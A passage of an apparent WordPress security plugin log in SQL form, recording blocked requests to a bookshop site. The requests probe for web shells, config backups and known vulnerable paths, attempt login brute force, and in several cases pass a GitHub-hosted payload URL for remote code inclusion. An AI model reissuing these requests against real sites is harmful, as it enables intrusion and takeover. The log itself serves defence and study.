x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','URLc07nbymt8xuAv63fsFqlH',0,1636927570.8876,393,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-content/wp-old-index.php?action=login&pass=-1&submit=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Bc9UyNC3zdneLGVq0XAWsrFZ',0,1636927572.7028,389,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/legion.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','uUvDkELIrG0pCM7RXfPicF92',0,1636927574.2503,379,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','F6CIBQiXzWvGAdaVf5wYDhP2',0,1636927575.8398,412,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-includes/lfx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','uyFTwtNBPHUb9src85manDil',0,1636927577.6021,391,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-includes/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','FiCRcZWousKNBqMJj3pLVS9e',0,1636927579.9034,381,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','jgHKn5PQvqSroEMdW7wLXDhJ',0,1636927581.6231,388,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','JCvbtdmI6FQ0cp2rjlBoGuXH',0,1636927583.3309,412,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Eusa1mDpG836dqhQ0RtIzMgY',0,1636927584.8727,378,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/test.php?Ghost=send','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','zRlLCYX08Eh3MJb7cfyWowSO',0,1636927586.3412,417,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-content/langar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Yy4e5bAlN2FxMzuHBfaIdP3v',0,1636927588.1211,374,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','uiW1oyGTk9dgUr3DqCLxKVAb',0,1636927589.5591,384,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','5jEfpiPZNhR0gJr6SocHQsnX',0,1636927591.5361,379,'','GET',403,0,700,0,1,'',0),('188.166.56.218',3165010138,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.87 Safari\\/537.36\"}','TyAwSCWvlef8N6dGDYM702zE',0,1636929233.0013,471,'','POST',403,0,600,0,1,'',0),('104.168.174.187',1755885243,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0 Safari\\/537.36\"}','pGsOXxMUvJlWoF9r3gz7CwIj',0,1636929599.0455,649,'','GET',403,0,520,0,1,'',0),('104.168.174.187',1755885243,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0 Safari\\/537.36\"}','VTrDFnutjH7woK0dUpfvksL1',0,1636929685.0084,611,'','GET',403,0,520,0,1,'',0),('74.208.34.142',1255154318,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.97 Safari\\/537.36\"}','iOXNEoU2gSv9kJfs7uQhY8lA',0,1636930450.0298,630,'','POST',403,0,600,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0 Safari\\/537.36\"}','9waj5vJ1VQOHkZBRPm4CFLSN',0,1636931734.8973,2226,'','GET',403,0,520,0,1,'',0),('103.144.253.38',1737555238,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.109 Safari\\/537.36\"}','pujXDEe8mSP1QIdTMrwl6NHa',0,1636931879.6845,3134,'','POST',403,0,600,0,1,'',0),('54.163.195.110',916702062,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/51.0.2704.106 Safari\\/537.36\"}','u1eaQmBGT4RKfnlIWSdsPrjU',0,1636932535.4565,1425,'','POST',403,0,600,0,1,'',0),('179.61.245.13',3007182093,'','https://ashbooks.co.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','iT7xVDqdfpWaeLKhbtU0Y1Q4',0,1636932753.2846,946,'','GET',403,0,700,0,1,'',0),('89.96.90.125',1499486845,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.116 Safari\\/537.36\"}','LFAXmCze8q7lJgiPkZSVIYbW',0,1636933191.8986,486,'','POST',403,0,600,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','C5kj79NiI13pqBagmuZWyHeQ',0,1636933310.2131,459,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','qthIv07yTdmf36PSzRaiCZsc',0,1636933311.9101,404,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','mueaqhRzoLFt45KZAk2OE7sN',0,1636933314.2238,432,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','eEd2TZvU74ajI6c5yBVNutDg',0,1636933317.2284,396,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/boom.php?x','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','LUIuxsB8TKAtWYRmrM5OlagJ',0,1636933327.4184,420,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/wp-content/plugins/backup_index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','9dtEf5FJLp0WKnliMZDXmQ4r',0,1636933329.0652,380,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/wp-content/db_cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','YvyDmQGJNdPV0uZlebEBot7p',0,1636933335.0303,414,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','zXq3J4IW8dVjCoQcZ1Ptgv0y',0,1636933336.3958,406,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','94ZTlwyPJjcdQt61x5uCSAfs',0,1636933339.9629,420,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Kly8JEOtvD3Xpgq042GVUnrj',0,1636933342.0650,382,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','tePfJGlz0OiysmYgB3aZK8WM',0,1636933343.6756,134,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/alfindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','NFxCZP325UBRTiKLg1nAMekc',0,1636933345.0708,378,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','kSnRaq7BzovcTdOb1VemrlA9',0,1636933346.8552,379,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/wp-booking.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','8QVNMUKZ5janSL4EW70zoYGf',0,1636933348.4280,441,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/cindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','gviptwMGBlTXH5SnKsd3YW4q',0,1636933350.0289,399,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/wp-content/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','pnykxGTvYuEF6qSAlVJQMIwi',0,1636933352.3090,408,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','sY0JWytqvKVlCfkEMzoiu58p',0,1636933354.3521,371,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/wp-includes/fonts/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','zkAXWmrQBY8tPZHjfnUuFJe0',0,1636933355.4816,400,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','6MHALbCGfePI9gcmKtTxz0Xv',0,1636933356.9878,422,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','YwnU4asTjPVIytMLzR7WcOmZ',0,1636933367.9323,409,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','blw4fqc7JZWpEh86zDMAPRoF',0,1636933369.5503,387,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/wp-admin/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','L5OjZRcuTKgEBDA947zHSfWt',0,1636933372.2269,411,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/wp-content/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','1kiel25BtDKo4mMux7QhrREG',0,1636933373.7901,393,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/wp-includes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','TIoDNQW7tEsCm82gfLeJP5hr',0,1636933375.4170,415,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/wp-content/themes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','j7OXV2iWfzJwsoAI3a1u9d4x',0,1636933377.0270,413,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/wp-content/plugins/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','MwsIPky1YqfpFLgtcv30Weu8',0,1636933378.3565,407,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/wp-includes/css/wp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Ec0xH173TRwkhmYdQgDK8bzq',0,1636933379.5383,398,'','POST',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/wp-content/plugins/ubh/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','21l3FUYWZAexG5Cfzp9TjoRi',0,1636933381.7949,379,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/wp-includes/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','PHYTSbk4BRA0XKwOMUuciIJn',0,1636933383.4129,393,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','B2giHmOEGcKw1M06DR9eLyfo',0,1636933385.1523,405,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/haders.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','7gPJuf1TapsBrLjdHSWXeOYv',0,1636933386.8647,381,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/wp-content/wp-old-index.php?action=login&pass=-1&submit=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','IXLmKEVnbZf741yztTHPN6sd',0,1636933388.5213,369,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/legion.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','aWRjV1UDF9Aud4MLh6bpIOr3',0,1636933390.0871,429,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Liz3SClFmsVQE4BpyvXU2TY7',0,1636933391.6044,365,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/wp-includes/lfx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','iZQpsYfmI9b2xWcOr5LnJwMl',0,1636933393.0733,418,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/wp-includes/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Et2KfxJRTlNw1DWhkYcoUsBL',0,1636933395.7330,409,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','XJUwbela98YmPo0DisdSkxVM',0,1636933399.9151,438,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','8FayE69r2XghzIbPj3VsTfOY',0,1636933401.8779,416,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','pf1zH450xXF7lvBmnMVwOr2L',0,1636933403.5152,417,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/test.php?Ghost=send','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','GJcXmbUl4EofQFukqh7P5Nxg',0,1636933405.1635,406,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/wp-content/langar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ldHM0hLgrCebn2SUA5XPFwVt',0,1636933406.6804,415,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','4sj3b9o7n0TF5vpWD2gSQKif',0,1636933408.3414,396,'','GET',403,0,700,0,1,'',0),('3.144.254.40',59833896,'','https://ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','SMmUklNbxABwt5L2Y8qsCczy',0,1636933410.0612,432,'','GET',403,0,700,0,1,'',0),('80.249.174.66',1358540354,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','i8o7JRvTbuXZ1yrmYP0QkqsE',0,1636933829.3445,428,'','POST',403,0,600,0,1,'',0),('13.94.249.188',224328124,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','1p7bSqsK5w8kNmo03UPhEe6R',0,1636934468.7099,903,'','POST',403,0,600,0,1,'',0),('82.208.189.233',1389411817,'','https://ashbooks.co.uk/xmrlpc.php?daksldlkdsadas=1','','{\"1\":\"Mozilla\\/5.0 (compatible; MSIE 8.0; Windows NT 6.2; WOW64; Trident\\/4.0)\"}','H0sFSDj1c7pveYTG25wAJybE',0,1636934789.8490,549,'','GET',403,0,700,0,1,'',0),('69.163.224.119',1168367735,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','UvFYj8TZcDW6BObyef1oqwN0',0,1636935187.2302,657,'','POST',403,0,600,0,1,'',0),('45.40.166.143',757638799,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','wUD0k4WAvqFlYrojiV7TfGOI',0,1636935905.3106,569,'','POST',403,0,600,0,1,'',0),('5.39.95.36',86466340,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','uvRXDx5h2J7nqsO9cbe6wHmY',0,1636937313.6378,1450,'','POST',403,0,600,0,1,'',0),('103.15.232.195',1729095875,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','6PzFAWaLbV5eMghR18nIQCoD',0,1636937984.9905,555,'','POST',403,0,600,0,1,'',0),('23.97.205.210',392285650,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','RqJZeHUBVWSfPmixThAaFErI',0,1636938728.0198,513,'','POST',403,0,600,0,1,'',0),('178.32.89.175',2988464559,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.167 Safari\\/537.36\"}','NIqjDxmdnbkBu0OtiZS8wvcG',0,1636939342.1063,532,'','POST',403,0,600,0,1,'',0),('194.233.72.23',3270068247,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) 